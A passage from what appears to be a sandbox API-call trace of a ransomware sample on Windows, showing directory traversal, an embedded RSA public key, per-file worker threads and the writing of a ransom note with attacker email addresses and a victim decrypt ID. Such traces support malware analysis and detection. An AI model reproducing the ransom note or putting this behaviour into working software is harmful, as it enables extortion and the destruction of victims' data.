lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.354] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0146.354] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0146.354] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0146.354] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0146.354] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0146.354] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0146.354] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0146.354] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="Desktop") returned 0x0 [0146.354] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0146.354] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\") returned 27 [0146.354] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.354] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.354] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\" [0146.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x910 [0146.355] Sleep (dwMilliseconds=0x96) [0146.505] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.505] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.505] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0146.505] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0146.505] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0146.505] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0146.505] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0146.505] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0146.506] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0146.506] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*" [0146.506] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="Desktop") returned 0x0 [0146.506] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0146.506] SetErrorMode (uMode=0x1) returned 0x1 [0146.506] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Videos\\_HELP_INSTRUCTION.TXT") returned 44 [0146.506] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0146.506] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0146.506] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x88c) returned 0x0 [0146.506] RegQueryValueExW (in: hKey=0x88c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43749f8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43749f8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0146.506] RegCloseKey (hKey=0x88c) returned 0x0 [0146.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0146.507] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0146.507] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x88c [0146.507] CloseHandle (hObject=0x88c) returned 1 [0146.507] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0146.507] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos") returned="Videos" [0146.507] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0146.507] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0146.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0146.507] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0146.507] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.507] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.507] lstrcmpW (lpString1="Sample Videos", lpString2="..") returned 1 [0146.508] lstrcmpW (lpString1="Sample Videos", lpString2=".") returned 1 [0146.508] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0146.508] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0146.508] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0146.508] SetErrorMode (uMode=0x1) returned 0x1 [0146.508] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0146.508] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.508] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.508] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0146.508] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11dd8 [0146.508] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos\\Sample Videos") returned="Sample Videos" [0146.508] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0146.508] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.508] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.508] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0146.508] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0146.509] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0146.509] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0146.509] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0146.509] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0146.509] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0146.509] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="Desktop") returned 0x0 [0146.509] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="DESKTOP") returned 0x0 [0146.509] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned 41 [0146.509] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.509] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0146.509] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x914 [0146.509] Sleep (dwMilliseconds=0x96) [0146.661] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.661] lstrcmpW (lpString1="Wildlife.wmv", lpString2="..") returned 1 [0146.661] lstrcmpW (lpString1="Wildlife.wmv", lpString2=".") returned 1 [0146.661] StrStrW (lpFirst="Wildlife.wmv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0146.661] StrStrW (lpFirst="Wildlife.wmv", lpSrch="ntldr") returned 0x0 [0146.661] StrStrW (lpFirst="Wildlife.wmv", lpSrch="NTLDR") returned 0x0 [0146.661] StrStrW (lpFirst="Wildlife.wmv", lpSrch="NTDETECT.COM") returned 0x0 [0146.661] StrStrW (lpFirst="Wildlife.wmv", lpSrch="ntdetect.com") returned 0x0 [0146.661] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="Desktop") returned 0x0 [0146.661] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="DESKTOP") returned 0x0 [0146.661] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned 41 [0146.661] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0146.661] lstrcpyW (in: lpString1=0x17be7c, lpString2="Wildlife.wmv" | out: lpString1="Wildlife.wmv") returned="Wildlife.wmv" [0146.661] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\" [0146.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x918 [0146.662] Sleep (dwMilliseconds=0x96) [0146.817] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0146.817] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 1 [0146.817] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 0 [0146.817] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos") returned="C:\\Users\\Public\\Videos\\Sample Videos" [0146.817] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0146.817] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="Desktop") returned 0x0 [0146.817] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="DESKTOP") returned 0x0 [0146.817] SetErrorMode (uMode=0x1) returned 0x1 [0146.817] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0146.817] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0146.818] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0146.818] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x924) returned 0x0 [0146.818] RegQueryValueExW (in: hKey=0x924, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4374c28, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4374c28*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0146.818] RegCloseKey (hKey=0x924) returned 0x0 [0146.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0146.818] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0146.818] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\videos\\sample videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.818] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\videos\\sample videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0146.818] WriteFile (in: hFile=0x924, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0146.819] CloseHandle (hObject=0x924) returned 1 [0146.819] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11dd8 [0146.819] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos\\Sample Videos") returned="Sample Videos" [0146.819] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0146.819] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0146.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0146.820] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0146.820] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0146.820] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 1 [0146.820] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 0 [0146.820] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0146.820] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0146.820] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0146.820] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0146.820] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0146.820] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0146.820] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0146.820] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0146.820] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0146.821] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 0 [0146.821] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0146.821] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0146.821] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0146.821] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0146.821] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0146.821] lstrcatW (in: lpString1="C:\\", lpString2="Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0146.821] SetErrorMode (uMode=0x1) returned 0x1 [0146.821] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0146.821] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0146.821] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Windows\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0146.821] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*" [0146.821] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0146.821] PathFindFileNameW (pszPath="C:\\Windows") returned="Windows" [0146.821] lstrcpyW (in: lpString1=0x17e824, lpString2="Windows" | out: lpString1="Windows") returned="Windows" [0146.821] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0146.821] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0146.821] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*" [0146.821] StrStrW (lpFirst="C:\\Windows\\", lpSrch="Desktop") returned 0x0 [0146.821] StrStrW (lpFirst="C:\\Windows\\", lpSrch="DESKTOP") returned 0x0 [0146.821] SetErrorMode (uMode=0x1) returned 0x1 [0146.821] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Windows\\_HELP_INSTRUCTION.TXT") returned 32 [0146.821] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0146.822] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0146.822] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x930) returned 0x0 [0146.822] RegQueryValueExW (in: hKey=0x930, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4374e58, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x4374e58*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0146.822] RegCloseKey (hKey=0x930) returned 0x0 [0146.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0146.822] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID 